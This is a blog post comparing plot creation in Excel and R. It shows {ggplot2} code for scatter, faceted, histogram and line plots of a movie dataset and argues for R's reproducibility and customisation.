&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-why-create-plots-in-R-Excel-part-2"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="understanding-changes"&gt;Understanding changes&lt;/h3&gt;
&lt;p&gt;In Excel it is challenging to eye-ball which changes have been made to a
graph, especially if these were minor changes. With R (and some easy to
use version control systems), you can see exactly which files were
changed. Also, in Excel, a user would usually draw a graph on a single
Excel document, and if the same graph is required on a different data
set, it is common to copy-and-paste a bunch of manipulations and
configurations to another document. Such repeated human interaction is
prone to introducing errors, as well as consuming a large amount of
time. With R we can avoid this by creating functions, which can be used
to run the same code on different data sets simply by changing the
input, thereby producing reliable outputs and saving us a lot of time.&lt;/p&gt;
&lt;h3 id="extensibility"&gt;Extensibility&lt;/h3&gt;
&lt;p&gt;Yes, Excel has a wide range of basic graphics available, but R has a lot
more. Excel has been around for a while, so it has some decent tools
that have been developed over the years. R, however, is open source, and
therefore extensions are widely available - it’s even fairly easy to
make your own. R also has thousands of libraries that can be used to
easily produce graphics without all the pre-graph work to create some
really crafty stuff. With that being said, Excel is perfectly sufficient
when creating basic, simple, straight forward plots. But what if we’re
not looking to be basic?&lt;/p&gt;
&lt;h3 id="the-simplicity-of-r"&gt;The simplicity of R&lt;/h3&gt;
&lt;p&gt;The package &lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;{ggplot2}&lt;/a&gt; is a plotting
package in R that provides us with commands to create complex plots. R’s
command line interface let’s you quickly select x- and y-axis labels,
colour by variables, modify grid lines and much more. Each item is added
in a new layer, which allows us to add in and remove graph elements
without affecting the rest of the plot. Interested in changing the
colour gradient/scale of your plot? No problem, just use a package
called
&lt;a href="https://earlglynn.github.io/RNotes/package/RColorBrewer/index.html" rel="external"&gt;{RcolourBrewer}&lt;/a&gt;,
which helps you select sensible colour schemes for your plots.
Interested in changing the title of your plot? Simply add a layer called
&lt;code&gt;ggtitle&lt;/code&gt; - and so much more.&lt;/p&gt;
&lt;h3 id="the-comparison"&gt;The comparison&lt;/h3&gt;
&lt;p&gt;Let’s create some simple plots in Excel and then create a similar plot
in R using the {ggplot2} functions. Hopefully, by the end of this post,
we’ll have motivated you to switch to R. Now, let’s get started by
loading the data and packages. The data set that we’ve used below is
data from a selection of movies, and is comprised of five columns:
country, year, highest profit gained per movie, number of movies
produced and number of employees on set during production.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# For plotting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;viridis&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Provides a range of colour palettes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# For loading data &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# For data wrangling&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;blog_data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s start by creating a scatter plot, in which we compare the number
of employees present in the different countries within each year.&lt;/p&gt;
&lt;h3 id="scatter-plot"&gt;Scatter Plot&lt;/h3&gt;
&lt;h4 id="excel"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The scatter plot generated in Excel was simple to create, but everything
had to be done manually: selecting the data and the variables for the x-
and y-axis and then selecting the type of plot. I was also required to
manually change the axes titles. If we were interested in changing the
grid lines, this would have to be done manually too. Looking at this
plot, is this something that you are able to easily recreate? Would you
know where to point and click to generate this visualisation?&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/scatter_plot.png" alt="Scatter plot generated with Excel." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r"&gt;R&lt;/h4&gt;
&lt;p&gt;Here we created a similar plot in R using the {ggplot2} functions.
Because the code is visible we can easily recreate the plot above, but
also, we are able to conveniently see which functions and aesthetics
were applied to our plot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; no_employees)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of employees&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_bw&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-scatter.png" alt="Scatter plot generated with R" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h3 id="theming-system-in-ggplot2"&gt;Theming system in {ggplot2}&lt;/h3&gt;
&lt;p&gt;Theme arguments specify the non-data features that you can control. For
example, the &lt;code&gt;axis.text&lt;/code&gt; argument controls the appearance of the axis
text such as the font size, colour and face of text. The &lt;code&gt;axis.ticks.x&lt;/code&gt;
controls the ticks on the x-axis and so on. The &lt;code&gt;theme()&lt;/code&gt; function
allows you to override the default theme elements, like
&lt;code&gt;theme(plot.title = element_text(colour = &amp;quot;red&amp;quot;))&lt;/code&gt;. &lt;a href="https://ggplot2.tidyverse.org/reference/ggtheme.html" rel="external"&gt;Complete
themes&lt;/a&gt;, like
&lt;code&gt;theme_bw()&lt;/code&gt;, set all of the theme elements to values designed to work
together.&lt;/p&gt;
&lt;p&gt;We can take this plot even further. Let’s say we were interested in
creating the same plot as above, but with each country having its own
plotting panel within the same visualisation. We can use the facet
function from the {ggplot2} package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; no_employees)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;Country, ncol &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of employees&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_bw&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(angle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt;, vjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-scatter-facet.png" alt="Scatter plot generated with R, with different panels for different countries" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;We have also utilised the &lt;code&gt;axis.text.x&lt;/code&gt; element to adjust the angle and
position of the x-axis labels to ensure that they are legible. Are you
able to create this in Excel without copying and pasting the graphs? If
so please do show us how you were able to do this.&lt;/p&gt;
&lt;p&gt;Now, let’s proceed to create a histogram using Excel and R. Looking at
the &lt;code&gt;theme()&lt;/code&gt; function alone, we can see that R has a lot more features
available that we are able to modify, such as axes text, fonts, legend
size and grid lines. As a data enthusiast, which graph looks more
aesthetically pleasing to you?&lt;/p&gt;
&lt;h3 id="histogram-plot"&gt;Histogram Plot&lt;/h3&gt;
&lt;h4 id="excel-1"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The histogram generated below was a bit more time consuming. Firstly, we
had to change the size of the bars in a normal bar graph in order to
generate a histogram. The colours of each column had to manually be
selected and applied. Adding a legend to this plot was also a manual
process. Looking at this plot, is this something that you are able to
easily recreate?&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/histogram_plot.png" alt="Histogram graph generated with Excel." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Now, let’s generate a histogram using R and its {ggplot2} functions.&lt;/p&gt;
&lt;h4 id="r-1"&gt;R&lt;/h4&gt;
&lt;p&gt;Once again, it is evident that we can easily control all of the
variables and aesthetics of the histogram plot generated using &lt;code&gt;ggplot&lt;/code&gt;.
Here we used a new function called the
&lt;a href="https://sjmgarnier.github.io/viridis/reference/scale_viridis.html" rel="external"&gt;&lt;code&gt;scale_fill_viridis()&lt;/code&gt;&lt;/a&gt;
which is a function for {ggplot2} which allowed us to modify the colours
visible on the histogram bars. We also used the &lt;code&gt;theme_classic()&lt;/code&gt;
function in R to create a classic looking plot with x- and y-axis lines
and no gridlines. We also edited the size, colour and font of the text
on the axes (&lt;code&gt;axis.text&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Highest_profit)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Yearly profit (in million dollars)&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Count&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_viridis&lt;/span&gt;(discrete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; T) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_classic&lt;/span&gt;()&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;serif&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-histogram.png" alt="Histogram plot generated with R" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Now, let’s move on and generate our last plot.&lt;/p&gt;
&lt;h3 id="line-plot"&gt;Line Plot&lt;/h3&gt;
&lt;h4 id="excel-2"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The line plot was the most complex plot to create. Firstly, when
generating the line graph, it was evident that the data within the year
column had to be rearranged in ascending order or it will put the
earlier years after the later years. The line graph was also not able to
plot more than one graph representing each country as a different line
as some countries did not have data for all the years. After a lot of
frustration with Excel we attempted to create a very basic line plot in
R.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/line_plot.png" alt="Line graph generated with Excel." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r-2"&gt;R&lt;/h4&gt;
&lt;p&gt;With only three lines of code and very little frustration, we were
easily able to recreate the line graph above in R.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Number_movies)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of movies produced&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-basic-line.png" alt="Basic line plot generated with R" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Now, let’s add some more aesthetics to our plot as we did for the
previous ones by changing the font size (&lt;code&gt;axis.title&lt;/code&gt; and &lt;code&gt;axis.text&lt;/code&gt;),
changing the panel border (&lt;code&gt;panel.border&lt;/code&gt;), as well as editing the
legend size (&lt;code&gt;legend.key.size&lt;/code&gt;). Here we decided to use the
&lt;code&gt;theme_dark()&lt;/code&gt; function in R to create a dark background, which is
commonly used to make thin coloured lines pop out.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Number_movies)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of movies produced&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_dark&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.border &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;, face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;, family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arial&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arial&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.key.size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unit&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.50&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cm&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-dark-line.png" alt="Line plot generated with R, with a dark background and thick border." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;When comparing R and Excel, it’s important to define the level of
information you are looking for. If you want to run basic statistics
quickly, Excel might be the better choice. If you are interested in
creating a very basic graph, Excel may be the better choice, due to its
easy point-and-click system. Before plotting a graph ask yourself; “How
detailed does my visualisation need to be? Am I creating a plot for a
publication or not? In Excel it is evident that we can easily select a
chunk of data and make a simple chart, however, when making more
comprehensive plots, using Excel can be extremely frustrating and time
consuming. It all comes down to what you need your graphics to do. For
those planning to publish large amounts of complicated data, spending
the time in R to create impressive visual representations will certainly
be worth your time. It is also clear that R is not difficult, and gives
you the option to customise more than Excel.&lt;/p&gt;
&lt;p&gt;R and Excel are beneficial in different ways. Excel starts off easier to
learn and is the go-to program when we are exposed to computers and some
of us end up being stuck there. However, R is designed to be
reproducible which is clearly of high importance. It’s not a question of
choosing between R and Excel, but deciding which program to use for
different needs.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning how to create graphs using R, then
attend our &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data visualisation with
ggplot2&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/"&gt;original post&lt;/a&gt;
